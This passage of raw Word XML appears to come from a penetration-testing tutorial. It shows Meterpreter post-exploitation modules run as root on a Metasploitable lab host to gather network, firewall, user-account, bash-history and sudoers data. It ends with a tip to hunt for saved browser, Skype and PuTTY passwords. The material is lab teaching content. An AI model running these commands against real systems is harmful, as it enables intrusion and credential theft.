    <w:p w14:paraId="5A6DC923" w14:textId="25050881" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] sysctl.conf stored in /root/.msf4/loot/20180704012519_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_981925.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291C3864" w14:textId="2B05250E" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC0DB9" w14:textId="0229551E" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B31A0C" w14:textId="77777777" w:rsidR="00E32046" w:rsidRPr="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7597514A" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/linux/gather/enum_network </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491670FA" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF912A4" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running module against metasploitable.localdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D0606" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Module running as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED1C79" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB73F5" w14:textId="04061353" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC512D" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Collecting data...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2F6A7" w14:textId="781B3C04" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Network config stored in /root/.msf4/loot/20180704012555_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.netwo_223360.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D2D33" w14:textId="1C86DD4E" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Route table stored in /root/.msf4/loot/20180704012555_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.netwo_467769.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BD0C5" w14:textId="6BAC9A65" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Firewall config stored in /root/.msf4/loot/20180704012555_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.netwo_876048.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFA852" w14:textId="0C3FAAC1" w:rsidR="00E32046" w:rsidRPr="00E32046" w:rsidRDefault="00E32046" w:rsidP="00F72937">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD6743" w14:textId="77777777" w:rsidR="00E32046" w:rsidRPr="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF02C7A" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/linux/gather/enum_protections </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E72ECC" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FAFFEE" w14:textId="7F6B29C8" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Running module against </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [metasploitable]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3933A9" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D814B" w14:textId="28D0057C" w:rsidR="00E32046" w:rsidRDefault="004A1C9D" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00E32046">
        <w:t>Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5D98F" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Finding installed applications...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A982F71" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] ufw found: /usr/sbin/ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6102DA" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] iptables found: /sbin/iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B74841" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] logrotate found: /usr/sbin/logrotate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B9E30" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] tcpdump found: /usr/sbin/tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0503C" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] aa-status found: /usr/sbin/aa-status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2DB7F" w14:textId="46A95819" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Installed applications saved to notes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D9B22" w14:textId="68DDDA1B" w:rsidR="004A1C9D" w:rsidRPr="004A1C9D" w:rsidRDefault="004A1C9D" w:rsidP="004A1C9D">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5D0D3C" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/linux/gather/enum_system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D18EB1" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535BD240" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD4183" w14:textId="4C30CC07" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327192E" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Module running as "root" user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFDC456" w14:textId="17531181" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Linux version stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_031092.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B621427" w14:textId="0D809070" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] User accounts stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_513771.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CABC7DA" w14:textId="4CBC7309" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Installed Packages stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_655395.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ECC0F" w14:textId="3B9CD3D5" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running Services stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_363789.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398761CC" w14:textId="20FE4359" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Cron jobs stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_453375.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF9CD0" w14:textId="6F441D85" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Disk info stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_839926.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF98E6" w14:textId="21ED3F76" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Logfiles stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_414842.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C99862" w14:textId="48333C32" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Setuid/setgid files stored in /root/.msf4/loot/20180704012801_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.syste_305898.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E79F80" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DEB84E" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B517B21" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] The specified meterpreter session script could not be found: post/linux/gather/enum_user_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED5EF4" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/linux/gather/enum_users_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006098CD" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D2A227" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4CEA8" w14:textId="53937AAF" w:rsidR="00E32046" w:rsidRDefault="004A1C9D" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00E32046">
        <w:t>Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD67885" w14:textId="36E03F80" w:rsidR="00604D85" w:rsidRPr="00604D85" w:rsidRDefault="00604D85" w:rsidP="00604D85">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCA528" w14:textId="0C76FFF3" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Failed to open file: /var/spool/lpd/.ash_history: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018C446" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Failed to open file: /var/spool/lpd/.bash_history: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF4C9D" w14:textId="3CAB3BAF" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] bash history for postgres stored in /root/.msf4/loot/20180704012959_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.users_159495.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101ADBA5" w14:textId="477FF0F2" w:rsidR="00604D85" w:rsidRPr="00604D85" w:rsidRDefault="00604D85" w:rsidP="00604D85">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FEBED8" w14:textId="570FAEF4" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Last logs stored in /root/.msf4/loot/20180704013017_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.users_514330.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2AC5D" w14:textId="1637B675" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00474054">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Sudoers stored in /root/.msf4/loot/20180704013017_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidR="00474054">
        <w:t>_linux.enum.users_675993.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2E45F" w14:textId="77777777" w:rsidR="00474054" w:rsidRPr="00474054" w:rsidRDefault="00474054" w:rsidP="00474054">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72071CBC" w14:textId="35C820C4" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Gaining information about the network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32925524" w14:textId="12E9D441" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9210B" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ARP cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED56A1A" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>=========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C544FBE" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7984263A" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    IP address      MAC address        Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB8929" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ----------      -----------        ---------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89E11A" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    192.168.22.20   00:50:56:b5:65:94  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DA247" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    192.168.22.254  00:50:56:b5:f4:82  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76972CC5" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209D7D80" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E45BC2" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A10D86" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Interface  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890A4AC" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A2FE7" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Name         : lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC8D74" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Hardware MAC : 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B817E" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MTU          : 16436</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51139D42" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Flags        : UP,LOOPBACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884C8B0" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv4 Address : 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913EE5E" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv4 Netmask : 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC4B51" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 Address : ::1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D21A9F" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F542871" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7664CFD4" w14:textId="41189F79" w:rsidR="00AE1064" w:rsidRPr="00D86352" w:rsidRDefault="00AE1064" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3067B2" w14:textId="70159104" w:rsidR="008846D3" w:rsidRDefault="001D2867" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>You can check all gathered information that were stored in the loot directory by issuing the loot command</w:t>
      </w:r>
      <w:r w:rsidR="006756C5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA82DDF" w14:textId="343C8890" w:rsidR="00764740" w:rsidRDefault="00764740" w:rsidP="00764740">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf &gt; loot </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –t linux.enum.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271EA91C" w14:textId="77777777" w:rsidR="006A3A46" w:rsidRDefault="006A3A46" w:rsidP="00137F97">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167DC944" w14:textId="0F456E03" w:rsidR="00137F97" w:rsidRDefault="00137F97" w:rsidP="00137F97">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00137F97">
        <w:t xml:space="preserve">Tips: </w:t>
      </w:r>
      <w:r>
        <w:t>there are some places where it is worth look</w:t>
      </w:r>
      <w:r w:rsidR="006A3A46">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at</w:t>
      </w:r>
      <w:r w:rsidR="006A3A46">
        <w:t>. For instance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application password</w:t>
      </w:r>
      <w:r w:rsidR="006A3A46">
        <w:t>s (Internet browsers, skype, putty…).</w:t>
      </w:r>
      <w:r w:rsidR="009D04E9">
